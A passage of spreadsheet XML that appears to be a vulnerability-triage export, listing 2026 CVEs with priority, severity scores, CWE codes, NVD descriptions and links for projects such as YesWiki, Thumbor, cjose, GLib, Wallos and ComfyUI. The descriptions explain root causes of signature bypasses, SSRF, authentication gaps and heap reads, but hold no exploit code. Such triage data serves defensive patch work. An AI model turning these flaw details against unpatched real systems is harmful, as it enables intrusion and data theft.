        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1725" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48771</t>
        </is>
      </c>
      <c r="C1725" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1725" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1725" s="5" t="inlineStr"/>
      <c r="F1725" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1725" s="5" t="inlineStr"/>
      <c r="H1725" s="5" t="inlineStr"/>
      <c r="I1725" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1725" s="5" t="inlineStr"/>
      <c r="K1725" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L1725" s="5" t="inlineStr">
        <is>
          <t>ishankportfolio is a portfolio website. Prior to version 1.0.1, contact form submissions could potentially be exposed due to improperly secured client-side database configuration and insufficient access control policies. Applications using publicly exposed database credentials or permissive database rules may allow unauthorised users to read, modify, or abuse stored form submission data. This could impact personally identifiable information (PII) submitted through the website contact form, including names, email addresses, phone numbers, and messages. The issue has been patched in version 1.0.1. Users unable to upgrade immediately can reduce risk by disabling public read/write database access, rotating exposed API keys, restricting database policies to authenticated requests only, moving sensitive operations to secure backend/serverless functions, and/or monitoring database activity logs for suspicious access.</t>
        </is>
      </c>
      <c r="M1725" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48771</t>
        </is>
      </c>
    </row>
    <row r="1726">
      <c r="A1726" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1726" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52767</t>
        </is>
      </c>
      <c r="C1726" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1726" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1726" s="5" t="inlineStr"/>
      <c r="F1726" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1726" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H1726" s="5" t="inlineStr"/>
      <c r="I1726" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1726" s="5" t="inlineStr"/>
      <c r="K1726" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L1726" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. From version 4.6.2 to before version 4.6.6, HttpSignatureService::verifySignature() checks the result of PHP's openssl_verify() with a loose boolean negation - if (!openssl_verify(...)) { throw ... }. PHP's openssl_verify has four possible return values: 1, 0, -1, and "false". The -1 row is the bypass: PHP's truthiness rules make -1 a truthy value, so !(-1) === false, the throw is skipped, and the controller proceeds to processActivity(). Any condition that makes OpenSSL's EVP_VerifyFinal() return -1 triggers the bypass. The reachable consequence is the controller silently treats a failed verification as success and processes the attacker's payload. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="M1726" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52767</t>
        </is>
      </c>
    </row>
    <row r="1727">
      <c r="A1727" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1727" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53500</t>
        </is>
      </c>
      <c r="C1727" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1727" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1727" s="5" t="inlineStr"/>
      <c r="F1727" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1727" s="5" t="inlineStr"/>
      <c r="H1727" s="5" t="inlineStr"/>
      <c r="I1727" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J1727" s="5" t="inlineStr"/>
      <c r="K1727" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1727" s="5" t="inlineStr">
        <is>
          <t>Thumbor is an open-source photo thumbnail service by globo.com. Prior to 7.8.0, the ALLOWED_SOURCES configuration passes plain strings to re.match() without escaping dots, so a hostname differing at dot positions can match the allowlist. This issue is fixed in 7.8.0.</t>
        </is>
      </c>
      <c r="M1727" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53500</t>
        </is>
      </c>
    </row>
    <row r="1728">
      <c r="A1728" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1728" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53501</t>
        </is>
      </c>
      <c r="C1728" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1728" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1728" s="5" t="inlineStr"/>
      <c r="F1728" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1728" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1728" s="5" t="inlineStr"/>
      <c r="I1728" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J1728" s="5" t="inlineStr"/>
      <c r="K1728" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L1728" s="5" t="inlineStr">
        <is>
          <t>Thumbor is an open-source photo thumbnail service by globo.com. Prior to 7.8.0, Thumbor’s HMAC validation can be bypassed due to the use of Python’s .replace() when removing the signature from the URL before validation. Since .replace() removes all occurrences of the substring, an attacker can insert the same signature multiple times in the URL and manipulate the final URL used for validation. This allows crafting URLs where the validated string differs from the actual requested resource, enabling loading images from unintended domains or paths. This issue is fixed in 7.8.0.</t>
        </is>
      </c>
      <c r="M1728" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53501</t>
        </is>
      </c>
    </row>
    <row r="1729">
      <c r="A1729" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1729" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53761</t>
        </is>
      </c>
      <c r="C1729" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1729" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1729" s="5" t="inlineStr"/>
      <c r="F1729" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1729" s="5" t="inlineStr"/>
      <c r="H1729" s="5" t="inlineStr"/>
      <c r="I1729" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1729" s="5" t="inlineStr"/>
      <c r="K1729" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1729" s="5" t="inlineStr">
        <is>
          <t>Frappe CRM is an open-source customer relationship management tool. Prior to version 1.73.0, there is an authentication bypass vulnerability via logged invitation keys in crm/api. This issue has been patched in version 1.73.0.</t>
        </is>
      </c>
      <c r="M1729" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53761</t>
        </is>
      </c>
    </row>
    <row r="1730">
      <c r="A1730" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1730" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53938</t>
        </is>
      </c>
      <c r="C1730" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1730" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1730" s="5" t="inlineStr"/>
      <c r="F1730" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1730" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1730" s="5" t="inlineStr"/>
      <c r="I1730" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1730" s="5" t="inlineStr"/>
      <c r="K1730" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="L1730" s="5" t="inlineStr">
        <is>
          <t>OpenIDC/cjose is a C library implementing the Javascript Object Signing and Encryption (JOSE). Prior to version 0.6.2.5, cjose's JWE decryption path for the AES Key Wrap key-management algorithms (`alg` = `A128KW`, `A192KW`, `A256KW`) does not validate the length of the attacker-supplied `encrypted_key` (JWE Encrypted Key) before unwrapping it into a fixed-size, heap-allocated Content Encryption Key (CEK) buffer. A remote, unauthenticated attacker who can submit a crafted JWE to an application that decrypts it with an AES-KW symmetric key can trigger an out-of-bounds heap write, corrupting the heap. This leads at minimum to a crash (denial of service) and, depending on the heap layout and allocator, may be leverageable for further memory-corruption impact. `cjose_jwe_import()` / `cjose_jwe_decrypt()` are pre-authentication entry points: they parse and process fully attacker-controlled input. Upgrade to cjose 0.6.2.5 to receive a patch. If upgrading is not immediately possible, reject the AES Key Wrap algorithms (`A128KW`/`A192KW`/`A256KW`) for untrusted JWEs at the application layer.</t>
        </is>
      </c>
      <c r="M1730" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53938</t>
        </is>
      </c>
    </row>
    <row r="1731">
      <c r="A1731" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1731" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54556</t>
        </is>
      </c>
      <c r="C1731" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1731" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1731" s="5" t="inlineStr"/>
      <c r="F1731" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1731" s="5" t="inlineStr"/>
      <c r="H1731" s="5" t="inlineStr"/>
      <c r="I1731" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1731" s="5" t="inlineStr"/>
      <c r="K1731" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="L1731" s="5" t="inlineStr">
        <is>
          <t>Http4s is a Scala interface for HTTP services. Prior to 0.23.35 and 1.0.0-M47, an unauthenticated HTTP/2 peer can cause an out-of-memory denial of service in the Ember backend with HTTP/2 enabled. The Hpack wrapper in ember-core/shared/src/main/scala/org/http4s/ember/core/h2/Hpack.scala concatenates HEADERS and CONTINUATION frame fragments and decodes them into a single List, but maxHeaderSize accounting does not include indexed headers or HPACK per-header overhead. A small compressed header block can therefore expand into a much larger decoded representation that remains in memory for processing. Servers exposed to untrusted HTTP/2 traffic and clients directed to an untrusted HTTP/2 server are affected, and concurrent malicious connections can exhaust the process heap. This issue is fixed in versions 0.23.35 and 1.0.0-M47.</t>
        </is>
      </c>
      <c r="M1731" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54556</t>
        </is>
      </c>
    </row>
    <row r="1732">
      <c r="A1732" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1732" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54600</t>
        </is>
      </c>
      <c r="C1732" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1732" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1732" s="5" t="inlineStr"/>
      <c r="F1732" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1732" s="5" t="inlineStr"/>
      <c r="H1732" s="5" t="inlineStr"/>
      <c r="I1732" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1732" s="5" t="inlineStr"/>
      <c r="K1732" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1732" s="5" t="inlineStr">
        <is>
          <t>Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.9.4, endpoints/db/import.php has no authentication. The only guard is a user-table row count — if zero (fresh/unconfigured install), an unauthenticated attacker can replace the entire database. This issue has been patched in version 4.9.4.</t>
        </is>
      </c>
      <c r="M1732" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54600</t>
        </is>
      </c>
    </row>
    <row r="1733">
      <c r="A1733" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1733" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55528</t>
        </is>
      </c>
      <c r="C1733" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1733" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1733" s="5" t="inlineStr"/>
      <c r="F1733" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1733" s="5" t="inlineStr"/>
      <c r="H1733" s="5" t="inlineStr"/>
      <c r="I1733" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1733" s="5" t="inlineStr"/>
      <c r="K1733" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-862</t>
        </is>
      </c>
      <c r="L1733" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonaiagents 1.6.58, AgentServer exposes ServerConfig.auth_token but AgentServer._create_app does not check it on any route. A remote caller can subscribe, publish, and perform other actions without a valid bearer token or X-Auth-Token even when authentication is configured. This issue is fixed in version 1.6.58.</t>
        </is>
      </c>
      <c r="M1733" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55528</t>
        </is>
      </c>
    </row>
    <row r="1734">
      <c r="A1734" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1734" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55533</t>
        </is>
      </c>
      <c r="C1734" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1734" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1734" s="5" t="inlineStr"/>
      <c r="F1734" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1734" s="5" t="inlineStr"/>
      <c r="H1734" s="5" t="inlineStr"/>
      <c r="I1734" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1734" s="5" t="inlineStr"/>
      <c r="K1734" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="L1734" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.58, create_auth_middleware() allows requests when auth=api-key lacks PRAISONAI_API_KEY or JWT authentication lacks PRAISONAI_JWT_SECRET. An externally bound Recipe server can therefore accept unauthenticated POST /v1/recipes/run requests despite authentication being enabled. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="M1734" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55533</t>
        </is>
      </c>
    </row>
    <row r="1735">
      <c r="A1735" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1735" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55571</t>
        </is>
      </c>
      <c r="C1735" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1735" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1735" s="5" t="inlineStr"/>
      <c r="F1735" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1735" s="5" t="inlineStr"/>
      <c r="H1735" s="5" t="inlineStr"/>
      <c r="I1735" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1735" s="5" t="inlineStr"/>
      <c r="K1735" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-306</t>
        </is>
      </c>
      <c r="L1735" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to 1.0.4, LiveViewConsumer.handle_mount sends a `{"type":"navigate","to":...}` frame when login_required, permission_required, or a redirecting on_mount hook denies a LiveView mount, but returns without closing the WebSocket or clearing self.view_instance. A browser follows the redirect, but a raw WebSocket client can ignore it and retain the mounted socket. Because LiveViewConsumer.handle_event does not recheck authentication or authorization, the client can send `{"type":"event",...}` frames that invoke @event_handler methods without an authenticated session, including through handle_live_redirect_mount, enabling unauthorized sensitive reads or mutations. This issue is fixed in version 1.0.4.</t>
        </is>
      </c>
      <c r="M1735" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55571</t>
        </is>
      </c>
    </row>
    <row r="1736">
      <c r="A1736" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1736" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56670</t>
        </is>
      </c>
      <c r="C1736" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1736" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1736" s="5" t="inlineStr"/>
      <c r="F1736" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1736" s="5" t="inlineStr"/>
      <c r="H1736" s="5" t="inlineStr"/>
      <c r="I1736" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J1736" s="5" t="inlineStr"/>
      <c r="K1736" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1736" s="5" t="inlineStr">
        <is>
          <t>ComfyUI is a modular diffusion model GUI, api and backend with a graph/nodes interface. Prior to 0.28.0, the /view endpoint served uploaded SVG files inline because image/svg+xml and related XML content types were absent from the dangerous-content-type handling, allowing stored cross-site scripting in the ComfyUI origin. This issue is fixed in version 0.28.0.</t>
        </is>
      </c>
      <c r="M1736" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56670</t>
        </is>
      </c>
    </row>
    <row r="1737">
      <c r="A1737" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1737" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56672</t>
        </is>
      </c>
      <c r="C1737" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1737" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1737" s="5" t="inlineStr"/>
      <c r="F1737" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1737" s="5" t="inlineStr"/>
      <c r="H1737" s="5" t="inlineStr"/>
      <c r="I1737" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J1737" s="5" t="inlineStr"/>
      <c r="K1737" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1737" s="5" t="inlineStr">
        <is>
          <t>ComfyUI is a node-based diffusion model GUI, API, and backend. Prior to 0.28.0, GET /userdata/{file} served user-controlled HTML and SVG files with extension-derived content types, allowing stored cross-site scripting in the ComfyUI origin and access to browser-stored API tokens, settings, workflows, and authenticated-equivalent API calls. The handler used web.FileResponse(path), so an uploaded .html/.svg was served as text/html/image/svg+xml. POST /userdata stores arbitrary request bodies (confined to the user's userdata directory). When a victim navigated to the file URL, the embedded script executed same-origin. The /view endpoint already forced dangerous MIME types to download; that protection had never been applied to /userdata. This issue is fixed in version 0.28.0.</t>
        </is>
      </c>
      <c r="M1737" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56672</t>
        </is>
      </c>
    </row>
    <row r="1738">
      <c r="A1738" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1738" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58010</t>
        </is>
      </c>
      <c r="C1738" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1738" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1738" s="5" t="inlineStr"/>
      <c r="F1738" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1738" s="5" t="inlineStr"/>
      <c r="H1738" s="5" t="inlineStr">
        <is>
          <t>gnome:glib, redhat:enterprise_linux</t>
        </is>
      </c>
      <c r="I1738" s="5" t="inlineStr">
        <is>
          <t>2026-06-30</t>
        </is>
      </c>
      <c r="J1738" s="5" t="inlineStr"/>
      <c r="K1738" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L1738" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in GLib. An off-by-one error can occur in the gvs_tuple_is_normal function in the glib/gvariant-serialiser.c file when doing an alignment padding check because the bounds check uses &gt; instead of &gt;=, causing an out-of-bounds read of only 1 byte. This issue can cause a minor information disclosure of 1 byte and a denial of service when the out-of-bounds read crosses a page boundary.</t>
        </is>
      </c>
      <c r="M1738" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58010</t>
        </is>
      </c>
    </row>
    <row r="1739">
      <c r="A1739" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1739" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58012</t>
        </is>
      </c>
      <c r="C1739" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1739" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1739" s="5" t="inlineStr"/>
      <c r="F1739" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1739" s="5" t="inlineStr"/>
      <c r="H1739" s="5" t="inlineStr">
        <is>
          <t>gnome:glib, redhat:enterprise_linux</t>
        </is>
      </c>
      <c r="I1739" s="5" t="inlineStr">
        <is>
          <t>2026-06-30</t>
        </is>
      </c>
      <c r="J1739" s="5" t="inlineStr"/>
      <c r="K1739" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L1739" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in GLib. A buffer over-read can occur in the g_regex_replace function when used with the `G_REGEX_RAW` compile flag and case-change replacement escapes because the string_append function processes matched substrings using UTF-8 functions that assume valid UTF-8 input, even when the string is treated as raw bytes. This vulnerability can cause a minor information disclosure of 1-5 bytes and a denial of service when the buffer over-read crosses a page boundary.</t>
        </is>
      </c>
      <c r="M1739" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58012</t>
        </is>
      </c>
    </row>
    <row r="1740">
      <c r="A1740" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1740" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58013</t>
        </is>
      </c>
      <c r="C1740" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1740" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1740" s="5" t="inlineStr"/>
      <c r="F1740" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1740" s="5" t="inlineStr"/>
      <c r="H1740" s="5" t="inlineStr">
        <is>
          <t>gnome:glib, redhat:enterprise_linux</t>
        </is>
      </c>
      <c r="I1740" s="5" t="inlineStr">
        <is>
          <t>2026-06-30</t>
        </is>
      </c>
      <c r="J1740" s="5" t="inlineStr"/>
      <c r="K1740" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L1740" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in GLib. A buffer over-read can occur in g_io_channel_read_line_backend() in the giochannel.c file when a custom line terminator with a length greater than one is set, causing memcmp to read past the GString buffer. This vulnerability can cause a minor information disclosure of 7 bytes or a denial of service when the buffer over-read crosses a page boundary.</t>
        </is>
      </c>
      <c r="M1740" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58013</t>
        </is>
      </c>
    </row>
    <row r="1741">
      <c r="A1741" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1741" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61638</t>
        </is>
      </c>
      <c r="C1741" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1741" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1741" s="5" t="inlineStr"/>
      <c r="F1741" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1741" s="5" t="inlineStr"/>
      <c r="H1741" s="5" t="inlineStr"/>
      <c r="I1741" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1741" s="5" t="inlineStr"/>
      <c r="K1741" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1741" s="5" t="inlineStr">
        <is>
          <t>Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.9.6, POST /endpoints/notifications/testemailnotifications.php accepts smtpaddress and smtpport from POST body with zero SSRF validation. PHPMailer connects to attacker-supplied host:port. Every other notification endpoint uses ssrf_helper.php but email was missed. Any authenticated user can probe internal network, cloud metadata. This issue has been patched in version 4.9.6.</t>
        </is>
      </c>
      <c r="M1741" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61638</t>
        </is>
      </c>
    </row>
    <row r="1742">
      <c r="A1742" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1742" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62673</t>
        </is>
      </c>
      <c r="C1742" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1742" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1742" s="5" t="inlineStr"/>
      <c r="F1742" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1742" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H1742" s="5" t="inlineStr"/>
      <c r="I1742" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1742" s="5" t="inlineStr"/>
      <c r="K1742" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="L1742" s="5" t="inlineStr">
        <is>
          <t>Grav is a file-based Web platform. Prior to 2.0.4, the Grav .htaccess and webserver-configs/htaccess.txt security rules omit the Apache [NC] flag and therefore compare sensitive directory and file-extension patterns case-sensitively. On a case-insensitive filesystem, an unauthenticated requester can use uppercase directory or extension variants to bypass the rules and retrieve files under user/accounts or user/config, including password hashes and security configuration. This issue is fixed in version 2.0.4.</t>
        </is>
      </c>
      <c r="M1742" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62673</t>
        </is>
      </c>
    </row>
    <row r="1743">
      <c r="A1743" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1743" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62959</t>
        </is>
      </c>
      <c r="C1743" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1743" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1743" s="5" t="inlineStr"/>
      <c r="F1743" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1743" s="5" t="inlineStr"/>
      <c r="H1743" s="5" t="inlineStr"/>
      <c r="I1743" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J1743" s="5" t="inlineStr"/>
      <c r="K1743" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-195</t>
        </is>
      </c>
      <c r="L1743" s="5" t="inlineStr">
        <is>
          <t>Coturn is a free open source implementation of TURN and STUN Server. From 4.5.2 through 4.14.0, when Coturn is started with --acme-redirect &lt;URL&gt; and exposes a plaintext-TCP listener, an unauthenticated remote client can send a single ordinary HTTP GET request and receive a 301 response whose Location header contains up to ~870 bytes of adjacent process heap memory. The leaked region is a recycled network receive buffer that is reused without being zeroed, so on a busy server it can contain data from other clients' requests (TURN credentials, OAuth tokens, relayed payloads). Root cause is a signed→unsigned conversion. This issue is fixed in version 4.15.0.</t>
        </is>
      </c>
      <c r="M1743" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62959</t>
        </is>
      </c>
    </row>
    <row r="1744">
      <c r="A1744" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1744" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63135</t>
        </is>
      </c>
      <c r="C1744" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D1744" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1744" s="5" t="inlineStr"/>
      <c r="F1744" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1744" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1744" s="5" t="inlineStr"/>
      <c r="I1744" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J1744" s="5" t="inlineStr"/>
      <c r="K1744" s="5" t="inlineStr">
        <is>
